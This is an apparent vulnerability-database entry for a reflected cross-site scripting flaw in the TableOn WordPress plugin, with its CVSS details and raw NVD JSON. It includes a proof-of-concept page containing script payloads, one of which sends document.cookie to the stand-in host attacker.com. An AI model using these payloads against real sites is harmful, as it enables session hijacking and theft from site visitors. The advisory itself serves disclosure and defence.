Security Vulnerability Report
中文
CVE-2025-69316 CVSS 7.1 HIGH

CVE-2025-69316

Published: 2026-01-22 17:16:27
Last Modified: 2026-04-27 21:16:24

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 TableOn posts-table-filterable allows Reflected XSS.This issue affects TableOn: from n/a through <= 1.0.4.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

TableOn <= 1.0.4.2 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69316 Reflected XSS PoC for WordPress TableOn Plugin --> <!-- Target: TableOn Plugin <= 1.0.4.2 --> <!-- Attack Vector: Malicious URL parameter injection --> <!DOCTYPE html> <html> <head> <title>CVE-2025-69316 PoC</title> </head> <body> <h2>CVE-2025-69316 Reflected XSS PoC</h2> <p>Click the link below to test the vulnerability:</p> <!-- Replace YOUR_TARGET_URL with actual TableOn page URL --> <a href='http://YOUR_TARGET_URL/?search=<script>alert(String.fromCharCode(67,86,69,45,50,48,50,53,45,54,57,51,49,54))</script>' target='_blank'>Click Me</a> <p>Or copy this URL:</p> <code id='malicious-url'></code> <script> // Generate malicious URL const baseUrl = window.location.origin + '/tableon-page/'; const xssPayload = '<script>alert(document.cookie)</script>'; const maliciousUrl = baseUrl + '?s=' + encodeURIComponent(xssPayload); document.getElementById('malicious-url').textContent = maliciousUrl; // Steal cookies PoC const stealCookiePayload = "<img src=x onerror='fetch(\"https://attacker.com/steal?c=\"+document.cookie)>' />"; console.log('Cookie stealing payload:', stealCookiePayload); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69316", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:27.333", "lastModified": "2026-04-27T21:16:23.773", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 TableOn posts-table-filterable allows Reflected XSS.This issue affects TableOn: from n/a through <= 1.0.4.2."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en RealMag777 TableOn posts-table-filterable permite XSS Reflejado. Este problema afecta a TableOn: desde n/a hasta &lt;= 1.0.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/posts-table-filterable/vulnerability/wordpress-tableon-plugin-1-0-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}